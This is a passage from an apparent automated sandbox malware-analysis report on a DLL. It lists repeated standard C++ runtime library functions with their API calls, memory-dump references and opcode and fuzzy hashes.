                          Yara matches
                          Similarity
                          • API ID: __cftoe
                          • String ID:
                          • API String ID: 4189289331-0
                          • Opcode ID: 1b5bd4146fc29dab95605e314cc46149ab1708f8355f3e56fe1141007958ed48
                          • Instruction ID: b04693f176100f01ff8d8e5a36528e08456677cf2f239af8ae628ca8f22cae23
                          • Opcode Fuzzy Hash: 1b5bd4146fc29dab95605e314cc46149ab1708f8355f3e56fe1141007958ed48
                          • Instruction Fuzzy Hash: 8F51D8B790420EEBEB5C8BEACC51E9E77BFEB49725F104519E825E7181EF34D5008660
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2242C8, Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(00000001,?,6E223EDB,6E21FA25,6E21FD54,?,6E21FF71,?,00000001,?,?,00000001,?,6E2C27E0,0000000C,6E22006E), ref: 6E2242D6
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2242E4
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2242FD
                          • SetLastError.KERNEL32(00000000,6E21FF71,?,00000001,?,?,00000001,?,6E2C27E0,0000000C,6E22006E,?,00000001,?), ref: 6E22434F
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: 11ca3798cb17ab8f4ad984dd8a1ade486fa50c10c5678894769fdd25300c3403
                          • Instruction ID: f1dbadee7f91d3c947d3c483ba98e15bbc5920e0da9bb9bb820dfe588d201991
                          • Opcode Fuzzy Hash: 11ca3798cb17ab8f4ad984dd8a1ade486fa50c10c5678894769fdd25300c3403
                          • Instruction Fuzzy Hash: 4201703615DB2B5FD78405F5AC9DA97376BEB17B7A330833AF014850D8EF528802C190
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20FA97, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20FA9E
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20FAA8
                          • int.LIBCPMT ref: 6E20FABF
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20FAF9
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FB19
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20FB37
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 0d2e6529828d6831b67168bd0fa987845102d9951ce64d97a50c9e9ae958fe24
                          • Instruction ID: f404a529c8d1b5821af0a7ab00ac64639aab1fa7b517d80822bcfb7494d569a5
                          • Opcode Fuzzy Hash: 0d2e6529828d6831b67168bd0fa987845102d9951ce64d97a50c9e9ae958fe24
                          • Instruction Fuzzy Hash: DA11067AA0051E8FCF00DBE0C894AEEB77BBF44B14F244919E4116B2D0DF749A45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20FB3D, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20FB44
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20FB4E
                          • int.LIBCPMT ref: 6E20FB65
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20FB9F
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FBBF
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20FBDD
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: f50bdd13fb5bdfe652d8237c1e4b6903938cda211a126a7cd3015429943347f3
                          • Instruction ID: 78c16c7cfdeef293c5514b18c1c363ef952ffcb74cea5a6842a6c889fabdd728
                          • Opcode Fuzzy Hash: f50bdd13fb5bdfe652d8237c1e4b6903938cda211a126a7cd3015429943347f3
                          • Instruction Fuzzy Hash: 5611067690051E9BCF04DBE4C898AEEB77BAF48B14F240909E511AB2D0DBB49A45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20FBE3, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20FBEA
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20FBF4
                          • int.LIBCPMT ref: 6E20FC0B
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20FC45
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FC65
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20FC83
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 5a8849c5b38dbda1ca21755790ce879d6de7a6c93fadb102331029b3e8d33d06
                          • Instruction ID: d1e7b642812f5fe2d79606500f628ac9fe5a98729226613b93c8deb2ffc433f1
                          • Opcode Fuzzy Hash: 5a8849c5b38dbda1ca21755790ce879d6de7a6c93fadb102331029b3e8d33d06
                          • Instruction Fuzzy Hash: 9311067590051D9BCF40DBE0C894EEEB77BBF44B14F240909E8106B2D0DFB49A44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21B898, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21B89F
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21B8A9
                          • int.LIBCPMT ref: 6E21B8C0
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E21B8FA
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B91A
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21B938
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 5141e150c987f14687410213f946ae7ab3c68ea652f40b7dca6d7c74b60acb0f
                          • Instruction ID: d08d6b302eae1b797f4fb565c8de8d8823559af4b1c173fd64c924e421521c79
                          • Opcode Fuzzy Hash: 5141e150c987f14687410213f946ae7ab3c68ea652f40b7dca6d7c74b60acb0f
                          • Instruction Fuzzy Hash: B811CE7991451ECBCF04DBE0C894AEDB7BBBF44B14F140919E510AB390DBB89E41CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21B93E, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21B945
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21B94F
                          • int.LIBCPMT ref: 6E21B966
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E21B9A0
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B9C0
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21B9DE
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 12d9f1bb7d0f9f2ca665b1fbe3dd440f4633d0f2298e9e35950886ecf55a60fe
                          • Instruction ID: b30431928973617535b6f04673bde7e034cd3064f742672db61ea0d389a179d7
                          • Opcode Fuzzy Hash: 12d9f1bb7d0f9f2ca665b1fbe3dd440f4633d0f2298e9e35950886ecf55a60fe
                          • Instruction Fuzzy Hash: 5F11BC7990451ECBCB04EBE0C894AEDB7BBBF44B14F140919E510AB390DBB49E45CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F94B, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F952
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F95C
                          • int.LIBCPMT ref: 6E20F973
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F9AD
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F9CD
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F9EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: c9718dbf1462f6be3960883d7f56220b603d32b925b0a5ba70420e688d8e2fa2
                          • Instruction ID: ce6fa70b025c62a46b7333a44e3d8e80089853d9f02c56ddcf649cf6b11fcda8
                          • Opcode Fuzzy Hash: c9718dbf1462f6be3960883d7f56220b603d32b925b0a5ba70420e688d8e2fa2
                          • Instruction Fuzzy Hash: DF11C17991052D9BCB00EBE0C894AEEB77BBF44B18F244909E4106B2D0DB74AA45CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E204747, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20474E
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E204758
                          • int.LIBCPMT ref: 6E20476F
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E2047A9
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2047BF
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E2047DD
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 9b0f32715b87e54a1759bc649193e9872409a344bc4b164295a414ea61986916
                          • Instruction ID: 6873a31d7f9ff45d95f5d602d1511cfdbbcd75cbc473d54ac18203b7e4455c53
                          • Opcode Fuzzy Hash: 9b0f32715b87e54a1759bc649193e9872409a344bc4b164295a414ea61986916
                          • Instruction Fuzzy Hash: 3111E379E0051D9FCB05DBE0C854AEDB7BAAF15714F108918E524AB2D0DBB49A45C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F7FF, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F806
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F810
                          • int.LIBCPMT ref: 6E20F827
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F861
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F881
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F89F
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: a386594008cd40e924b6c70d0c9b65f6336abb5a3e409ae73e54fdea3402d8aa
                          • Instruction ID: 8688bbfb5126637dbdccf3455e9659dd8b3f6ee28c6a2945f365496b19e5a522
                          • Opcode Fuzzy Hash: a386594008cd40e924b6c70d0c9b65f6336abb5a3e409ae73e54fdea3402d8aa
                          • Instruction Fuzzy Hash: F1110A75D1052DCBCF01EBE0C894AEEB77BAF45B14F240904D4106B2D0DB749A84C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F41B, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F422
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F42C
                          • int.LIBCPMT ref: 6E20F443
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F47D
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F49D
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F4BB
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 839303fdf665165a7799a76378e30577329f39a3d10d44992772ca2522db32c9
                          • Instruction ID: a5d1dd125845e15b005faedafa4bb64f4ef57cd44b46559f3334f0af271d1c59
                          • Opcode Fuzzy Hash: 839303fdf665165a7799a76378e30577329f39a3d10d44992772ca2522db32c9
                          • Instruction Fuzzy Hash: 4411E375A1051E9BCF00EBE0CC94AEEB77BBF44B25F240918E9116B2D0DFB49A44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20A24B, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20A252
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20A25C
                          • int.LIBCPMT ref: 6E20A273
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20A2AD
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A2CD
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20A2EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 5a394ba2f1bce5b3a882115d99e270e00b5ae1972690586da189c526454c2d97
                          • Instruction ID: 636a2fded1faa2f8d9604b56e602cb01600b6586baba97773650e95b435a012b
                          • Opcode Fuzzy Hash: 5a394ba2f1bce5b3a882115d99e270e00b5ae1972690586da189c526454c2d97
                          • Instruction Fuzzy Hash: D31106B5A0052E8FCF00DBE4C898AEDB77BBF54714F140918E4116B2D0DF749A44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F2CF, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F2D6
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F2E0
                          • int.LIBCPMT ref: 6E20F2F7
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F331
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F351
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F36F
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 2c848cb13beadcee12b9ee0a4465e619a212da20e7d4cf7e2555c4c6c133399c
                          • Instruction ID: 10625688a95a7fcfc8cc82e3f48675f4d5747b483601fc92543ebc04cc0c7c02
                          • Opcode Fuzzy Hash: 2c848cb13beadcee12b9ee0a4465e619a212da20e7d4cf7e2555c4c6c133399c
                          • Instruction Fuzzy Hash: A911E37591055D8FCF00DBE0C894AEEB77BBF44B19F240909E420AB2D0DFB4AA80CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20A1A5, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20A1AC
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20A1B6
                          • int.LIBCPMT ref: 6E20A1CD
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20A207
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A227
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20A245
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 8eacfa44a4fc4aa00f51fb43b9a1b091958e26e4a8ed8fe633adb453273c0569
                          • Instruction ID: 6e44de99da2cb1ebe52b4e5df4bd36382c4cfab6883d3680bdc0eca246e7b81f
                          • Opcode Fuzzy Hash: 8eacfa44a4fc4aa00f51fb43b9a1b091958e26e4a8ed8fe633adb453273c0569
                          • Instruction Fuzzy Hash: 8311E3B690051E9FCF00EBE4C898AEDB77BAF44714F540919E4106B2D0DFB89A45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2046AB, Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E2046B2
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2046BC
                          • int.LIBCPMT ref: 6E2046D3
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20470D
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E204723
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E204741
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 5f90f26e08f2838698c0b7c978f986d40517162ec772511e8c5e21d796359592
                          • Instruction ID: 325578467af4ab80f22256d81193297801e9c7faf2b1cfb461339df5bedec8d4
                          • Opcode Fuzzy Hash: 5f90f26e08f2838698c0b7c978f986d40517162ec772511e8c5e21d796359592
